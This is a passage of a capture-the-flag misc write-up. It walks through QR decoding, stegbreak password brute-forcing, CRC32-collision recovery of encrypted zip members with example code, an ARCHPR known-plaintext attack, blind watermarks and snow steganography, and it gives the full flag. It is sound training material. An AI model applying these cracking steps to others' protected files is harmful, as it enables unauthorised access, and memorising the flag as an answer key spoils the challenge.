001111100011111111111100000001011111111010010011111110011111001001110011111100000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Save the decoded binary as file.txt; total length: 3600.
Script to turn the 0/1 string into a QR code:
from PIL import Image

MAX = 60  # 3600 bits = a 60x60 grid of modules
# the decoded bit string; 1 = black module, 0 = white module
bits = (
    "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000001001100001000000000111000011111111111000011111111111100000001101110001000000000111000011111111111000011000000001100100111111100100000000011001110010000000001000011000000001100100001101100100000000000011110010000000001000011001111001100100001001100100111000000111010010011111001000011001111001100001000000011100111111100100000010011111001000011001111001100000000000011100111101100100000010011111001000011001111001100111001001111111111001100111000000011111001000011000000001100110000000001111001101101100000010000000001000011000000001100100110000000111000111111100110010000000001000011111111111100100110010010011001101100100110011111111111000011111111111100100110010011000001001100100110011111111111000000000000000000100111111100100110001110001000000000000000000000000000000000100011111000100110000111011000000000000000000011100110001111000000010000000110000011111110011110001110000001100000000000000000010000000110000000000110010000000000000000100000010000111000010000001111001100000110000000100000000011100110011111100000000000000100010011100111110000100110000011100110011111100000000000000110010011100111110000100110000011001110000000111110000000100001000001001001110000001001000000011000000001110110000001110001000011000001110000000000000000111000001111100110000011111111000011000111111100100000000000001110010011000000000011000001110011100111110010001001000000001110010010000000000010000001110011100111110011001001000000111000001100111111110000000111000011111110000011100111000000110000000100111111100000000111000011111110000001100011000000000001000000100000000000000110000011100110010000001001000000000000000001100000000000000000000011100110111000000000000000100010011111100001000000001000000111111111011111000000000000110000000011100000001111111001100000011000000000100000000000111000000011100000001111111001110000001000000000100000000011100001001"
    "11111111111000000011100111000011000001100000000001111000110001001100111000000011000011100011000000000000000001111100111001100100101111111111001111100001001110011111100001100000111110000100000000010000000111100011000000011100100001000000111110000100000000010000000111000011000000011100100000011011100000011100000000000000001110000011111000001100100000111111100000011000000000000000011100000001101000000100100001111100000110010000100000000011111000010000000001100010000000111100000000010000110000000000000000110000000001100000000000011100100000010011111000011100000001110000000111000100000001100111000111110011111001111111100001010011111111100011000001000111000111110011111001111111100001110011011111100011000000000000000000010011001001110000001110001111000001100000100000000000000000010011000001100000000110000011000001100000100001111111111110010011000111000110000111100011001001100111100001100000000110000111100000011111111001110001000001100111000001100000000110000111100000011111111001110011000001100111000001100111100110000100001000000100001001110011111111100000000001100111100110000100001000001100001001100001111111000000000001100111100110010011000111111111000111110000111000011011100001100111100110000011000110000000000000110000000000011011100001100111100110000011111110000000100001110011000000000011100001100000000110011100100111000011001111100011111111111100000001100000000110011100100111000011001111100011111111111100000001011111111010010011111110011111001001110011111100000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
)
assert len(bits) == MAX * MAX, "expected 3600 bits"

img = Image.new("RGB", (MAX, MAX))
i = 0
for x in range(MAX):
    for y in range(MAX):
        if bits[i] == '1':
            img.putpixel((x, y), (0, 0, 0))        # black module
        else:
            img.putpixel((x, y), (255, 255, 255))  # white module
        i += 1
img.show()
img.save("result.png")
This gives a QR code; scan it with QR Research.
Download level4.zip from the cloud drive link and unzip it to get level4.jpg.
stegdetect reports jphide.
Use stegbreak to brute-force the password: power123
Open the image in JPHS, click Seek and enter the password.
It then exports a file (no extension is needed, any file name will do); here it was exported as level4:
level4_here_all
Download the attachment from the cloud drive: level5.zip. Unzip it; the contents:
level5_is_aaa
level6.zip and level7.zip both have archive passwords and cannot be opened. Looking at level6.zip first, every original file is <= 5 bytes, which suggests a CRC32 collision. Many other CRC32 collision scripts from the web did not work; this Zip-CRC32 collision script finally did:
Zip-CRC32 collision script: https://github.com/kmyk/zip-crc-cracker
Note: I ran the script on Linux; it failed several times on Windows.
Arrange the recovered pieces in the order 1, 2, 3:
level6_isready
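Why tiny encrypted members leak their contents: a zip header stores each member's CRC32 and uncompressed size in the clear, password or not, and for a few bytes the CRC is a near-unique fingerprint. The following added example (my own code, not the kmyk tool or the writeup's) builds a constructed, unencrypted archive with three short members, reads the metadata the way any tool would, and brute-forces each member over a small alphabet. Names and sample contents are mine; real level6.zip members would be read the same way since infolist() needs no password.

```python
import binascii
import io
import itertools
import string
import zipfile


def make_sample_zip() -> bytes:
    """Constructed stand-in for level6.zip: three members of 2-3 bytes each."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("1", b"is")
        zf.writestr("2", b"re")
        zf.writestr("3", b"ady")
    return buf.getvalue()


def entry_metadata(zip_bytes: bytes):
    """(name, CRC32, size) per member; these header fields are unencrypted in every zip."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [(info.filename, info.CRC, info.file_size) for info in zf.infolist()]


def crc32_preimages(crc: int, size: int, alphabet: str = string.ascii_lowercase):
    """Every string of exactly `size` bytes over `alphabet` whose CRC32 equals `crc`."""
    return [bytes(combo)
            for combo in itertools.product(alphabet.encode(), repeat=size)
            if binascii.crc32(bytes(combo)) == crc]


def recover_short_members(zip_bytes: bytes, alphabet: str = string.ascii_lowercase,
                          max_size: int = 4) -> dict:
    """Map each member name to its candidate contents; skip members too large to search."""
    recovered = {}
    for name, crc, size in entry_metadata(zip_bytes):
        if size <= max_size:
            recovered[name] = crc32_preimages(crc, size, alphabet)
    return recovered


if __name__ == "__main__":
    sample = make_sample_zip()
    for name, crc, size in entry_metadata(sample):
        print(f"member {name}: crc32={crc:08x} size={size}")
    for name, candidates in sorted(recover_short_members(sample).items()):
        print(name, candidates)
```

The search space is |alphabet|^size, so the alphabet is the knob: lowercase letters for 3 bytes is 17,576 CRC computations, the full printable set for 5 bytes is several billion, which is why the writeup's tool needs a real run rather than a quick script.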
Open level7.zip in ARCHPR, compress 1.png into 1.zip, add it as the known plaintext and run the plaintext attack.
According to other players' writeups, it can be stopped once the remaining time drops below 1h.
It then automatically saves the decrypted archive as level7_decrypted.zip.
Unzip level7_decrypted.zip directly. 4.png and 5.png have the same resolution but different sizes: blind watermark.
BlindWaterMask: https://github.com/chishaxie/BlindWaterMark
PS D:\Tools\Misc\BlindWaterMark> python3 .\bwmforpy3.py decode .\4.png .\5.png result.png
image<.\4.png> + image(encoded)<.\5.png> -> watermark<result.png>
level7ishere
It also gives the address of the final level: http://39.99.247.28/final_level/
HTML snow steganography
Decoder site for HTML snow steganography: http://fog.misty.com/perry/ccs/snow/snow/snow.html
Fill in the URL in the right format; the Password is the text inside the parentheses in the challenge's comment. Click Decrypt:
the_misc_examaaaaaaa_!!!}
In summary, the flag is the concatenation of the parts:
flag{level1_begin_and_level2_is_comelevel3_start_itlevel4_here_alllevel5_is_aaalevel6_isreadylevel7isherethe_misc_examaaaaaaa_!!!}
These are only a small fraction of the online challenges; I am not that skilled and have only reproduced these so far. I will add more as I work through the others.